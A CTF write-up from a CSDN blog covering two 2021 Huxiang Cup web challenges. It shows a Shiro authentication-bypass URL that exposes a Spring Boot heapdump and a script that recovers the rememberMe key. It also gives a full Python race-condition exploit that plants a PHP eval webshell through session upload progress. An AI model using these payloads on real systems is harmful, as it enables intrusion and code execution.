2021第七届湖湘杯-web-wp

最新推荐文章于 2023-06-24 00:00:00 发布
最新推荐文章于 2023-06-24 00:00:00 发布
阅读量4.1k 收藏
点赞数 1
分类专栏: Web 文章标签: php 安全 安全漏洞 wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wanmiqi/article/details/121334649
版权

2021第七届湖湘杯-web-wp

Web2 Pentest in Autumn

题目给的附件Pom.xml

Pom.xml 中有actuator
http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/actuator

Springboot中actuator常见接口(1.x能够直接访问,2.x是在actuator目录下)
在这里插入图片描述

由于没有权限,接下来访问都是302
http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/actuator/health
http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/actuator/env
(信息泄露)

Shiro1.5 鉴权绕过去下载文件
http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/aa/…/;test=/actuator/health
把文件都下载下来

下载heapdump
http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/aa/…/;test=/actuator/heapdump

利用 visualvm 打开下载的heapdump文件
https://visualvm.github.io/download.html

全局搜索org.apache.shiro.web.mgt.CookieRememberMeManager

在这里插入图片描述
将byte转换成base64形式的key

import base64
import struct

res = base64.b64encode(struct.pack('<bbbbbbbbbbbbbbbb', 58,5,22,5,117,45,-35,82,-15,62,-57,117,-78,15,23,-89))
print(res)

(参考:https://www.cnblogs.com/icez/p/Actuator_heapdump_exploit.html)

在这里插入图片描述
CB链,Spring回显

在这里插入图片描述

Web1 easywill

题目没有给源码,根据描述从网上下一份easywillV2.1.5(https://gitee.com/willphp/willphpv2/tree/808b3a36d366f66a88fd130cc6514c20eaf15450/)

首页中assign可控两个参数,其中根据view函数发现覆盖变量cfile
在这里插入图片描述
尝试session包含
Exp

# coding=utf-8
import io
import requests
import threading

sessid = 'flag'
data = {"cmd": "system('cat /ffffffff14ggggggg3');"}
url = "http://eci-2zec2ffu8ckzf0eggcpe.cloudeci1.ichunqiu.com/index.php"

def write(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post(url,
                            data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'},
                            files={'file': ('midi.txt', f)}, cookies={'PHPSESSID': sessid})


def read(session):
    while True:
        resp = session.post(url+'?name=cfile&value=/tmp/sess_' + sessid,
                            data=data)
        if 'midi.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            pass


if __name__ == "__main__":
    event = threading.Event()
    with requests.session() as session:
        for i in range(1, 30):
            threading.Thread(target=write, args=(session,)).start()

        for i in range(1, 30):
            threading.Thread(target=read, args=(session,)).start()
    event.set()

在这里插入图片描述

ISMidi
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021-河南省金盾-部分题目wp(详细)
02-06
WEB:上传你的头像吧、上传你的压缩包吧、管理员才能拿flag Crypto:Hi There、低音吉他谱、未完成的宣传图 Misc:潦草的笔记、这可是关键信息、hello-world Reverse:Re1、Re2、Re4
NGINX-WP-Rocket:NGINX最佳WordPress性能增强器配置-WP Rocket Rock ..
05-12
-- NGINX-WP-Rocket NGINX-WP-Rocket是缓存插件的配置。 它使Nginx可以直接提供以前缓存的文件,而无需调用WordPress或任何PHP。 它还添加了标头来缓存CSS,JS和媒体,以便通过减少对Web服务器的请求来利用浏览器的...
CTF 湖湘 决赛 2021 final.zip
12-07
CTF 湖湘 决赛 2021 final
[HXBCTF 2021]湖湘easywill
weixin_45751765的博客
12-01 3679
0x00 前言 这次接触到pear有点陌生 先本地弄弄 参考师傅 https://blog.csdn.net/rfrder/article/details/121042290 啥是Pear? pear (全称为PHP扩展与应用库) 1.如前所述,PEAR按照一定的分类来管理PEAR应用代码库,你的PEAR代码可以组织到其中适当的目录中,其他的人可以方便地检索并分享到你的成果。 2.PEAR不仅仅是一个代码仓库,它同时也是一个标准,使用这个标准来书写你的PHP代码,将会增强你的程序的可读性,复用性,减少
2021湖湘wp_web
meteox的博客
11-15 4184
easywill will框架,版本是1.51,直接gitee下载源码回退版本即可https://gitee.com/willphp/willphpv2 该框架参考了thinkphp,开头首页给出了assign($name,$value)渲染,然后return了view(),thinkphp有个相关的文件包含漏洞和这个很像 https://www.freebuf.com/column/207878.html 从view->fetch->render->renderTo逐步跟进,发现有变量覆
[湖湘 2021 final]Penetratable
v2ish1yan的博客
09-15 881
湖湘
[湖湘 2021 final]Penetratable-----记suid提权
最新发布
qq_73767109的博客
06-24 334
于是可以根据这个发包对里面的data改写成root的,这要登录在admin下进行修改,因为root没有权限哪只能是admin有。sed命令来自英文词组“stream editor”的缩写,其功能是用于利用语法/脚本对文本文件进行批量的编辑操作。可以看到有目录泄露,经过读取有static里可以看到有用信息其他的都说php文件读取后没有回显。但是用同样的方式发现不能对root进行修改密码导致不能登录root。这样意思是在admin下修改root的密码,这里修改为root。登录后暂时没有发现什么有用的信息。
web-stories-wp:WordPress的网络故事
02-05
建立状态 是一种免费的开放式Web视觉叙事格式,可让您轻松地通过引人入胜的动画和可点击的交互方式创建视觉叙事,并使读者沉浸在出色且快速加载的全屏体验中。 借助 ,我们提供了一流的Web Stories支持。 通过直接...
Learn-wp-cli:命令行,WP-CLI和自定义WP-CLI命令入门
02-05
**WP-CLI(WordPress Command Line Interface)是WordPress开发和管理中的一个强大工具,它允许用户通过命令行界面执行各种操作,而无需通过图形用户界面。本教程将带你深入理解WP-CLI,包括如何安装、使用基础命令...
第二届赣网WEB第一题WP.docx
12-06
【第二届赣网WEB第一题】是一场网络安全竞赛中的Web挑战赛题目,主要涉及CTF(Capture The Flag)领域的知识。此题目的核心是通过解决一个连连看游戏来获取隐藏的FLAG,以此来检验参赛者的Web安全技能和逆向工程...
2021-湖湘final-Web
feng的博客
01-05 2099
2021-湖湘final-Web 前言 今年湖湘报的社企组的结果就是最后只能摆烂,然后决赛那段时间正好在复习期末,然后考完了想好好的休息一段时间,打游戏打累了再来复现一下湖湘final的题目放松放松。 vote 今年HTB的基本上算是原题了,复现的时候才发现当时做那题的时候就摆烂没管了,所以一点印象没有。。。 const path = require('path'); const express = require('express'); const pug
湖湘2021-pwn-final部分复现
qq_53062301的博客
12-09 4921
第一次参加awd+,虽然成绩不是很好(大佬太多被打烂了),有很多收获,awd+赛制中可以通过攻击和防御两个手段来得分,攻击的话就是类似于正常的ctf,只不过如果成功攻击后,平台会使用官方的exp来去打全场,就是如果攻击成功,每轮(这次湖湘是20分钟一轮)都会获得攻击得分,得分会随着做题成功人数增多而减少,防御的话就是patch一下程序,然后通过ftp上传到服务器上,然后申请防御,也是防御成功就会每轮都会得分,但是防御有三种情况,一种是exp利用成功,也就是没有防御成功,还有一种清况,就是c...
刷题日记 date 6.7
m0_64348326的博客
06-07 103
这种方式我刚开始在普通用户的测试越权时试过是不行的,可能是由于这个账号是admin的原因导致这种方式又能成功越权执行了。而这两个功能是在类Notes中,node.js的类实际上还是语法糖,本质还是函数。1.先注册个用户,进入后台发现有修改密码的地方,抓包查看是否有逻辑越权,但是由于需要旧密码,导致这步失败了。4.注意到管理员的修改密码功能被禁止了,查看req.js文件,找到了一段js,这里有隐藏的修改密码接口。一次包含,这个我是真没猜到,因为啥提示都没有,我猜测的是可能设置了文件读写权限。
2020湖湘 wp
weixin_46330722的博客
11-02 1836
2020湖湘 wpweb题目名字不重要反正题挺简单的NewWebsite 今天打了下湖湘,签到选手上线。 web 题目名字不重要反正题挺简单的 题目源码 <?php error_reporting(0); //I heard you are good at PHPINFO+LFI, flag is in flag.php, find it my dear noob vegetable hacker. if ( isset($_GET['file']) ) { $file = $_GET
2021湖湘web部分wp
fmyyy1的博客
11-14 1853
前言 快期末了这学期准备退役了,下学期继续努力(大二课怎么这么多啊!!!期末考怎么办啊!!!一节课没听啊!!!) 今天上线看看题 easywill 这题没啥好说,跟tp3的rce差不多 直接 ?name=cfile&value=/etc/passwd 就能文件包含,之后找不到flag,用拟态的的那个包含pearcmd.php就能getshell Pentest in Autumn 下个pom.xml附件 看到shiro <?xml version="1.0" encoding="UTF-8"
湖湘2020 easyre wp
苗_的博客
11-10 441
很久没有写题解博客了,最近忙着学习深度学习= =,湖湘这道题还是不错的,可以锻炼一下自己动态调试的能力,所以刚好在练习的过程中记录一下,方便以后回顾: 首先拿到文件,查壳发现无壳,运行一下大概就是先判断长度,再判断是否是正确flag: 长度错误就输出wrong length并退出。 拿到ida里看一下,发现没有很明显的入口函数,查找字符串找到input your flag:,找到主函数位置 f5看一下,发现没办法反编译,所以我们就直接上动态调试吧: 在0x40DA40下断点(f2),f8单步
2017湖湘pwn100的wp
一个码农的笔记
11-30 2709
湖湘的pwn比赛很有趣,我做了pwns100的题目,感觉不错,我把wp分享出来,pwns的下载链接是:http://download.csdn.net/download/niexinming/10139497 把pwns100直接拖入ida中: main函数: base64解码函数 输入函数 可以看到read可以输入的字符串可以长达0x200个,这里可造成缓冲区溢出漏洞
虹润牌19--HR-WP-HZ单屏工频周波表技术手册
"19--HR-WP-HZ单屏系列工频周波表,虹润技术资料" 19--HR-WP-HZ单屏系列工频周波表是由虹润公司推出的智能仪表,专用于交流电工显示和控制。这款仪表具有全面的功能和高效的省配线解决方案,适用于各种工业环境中的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值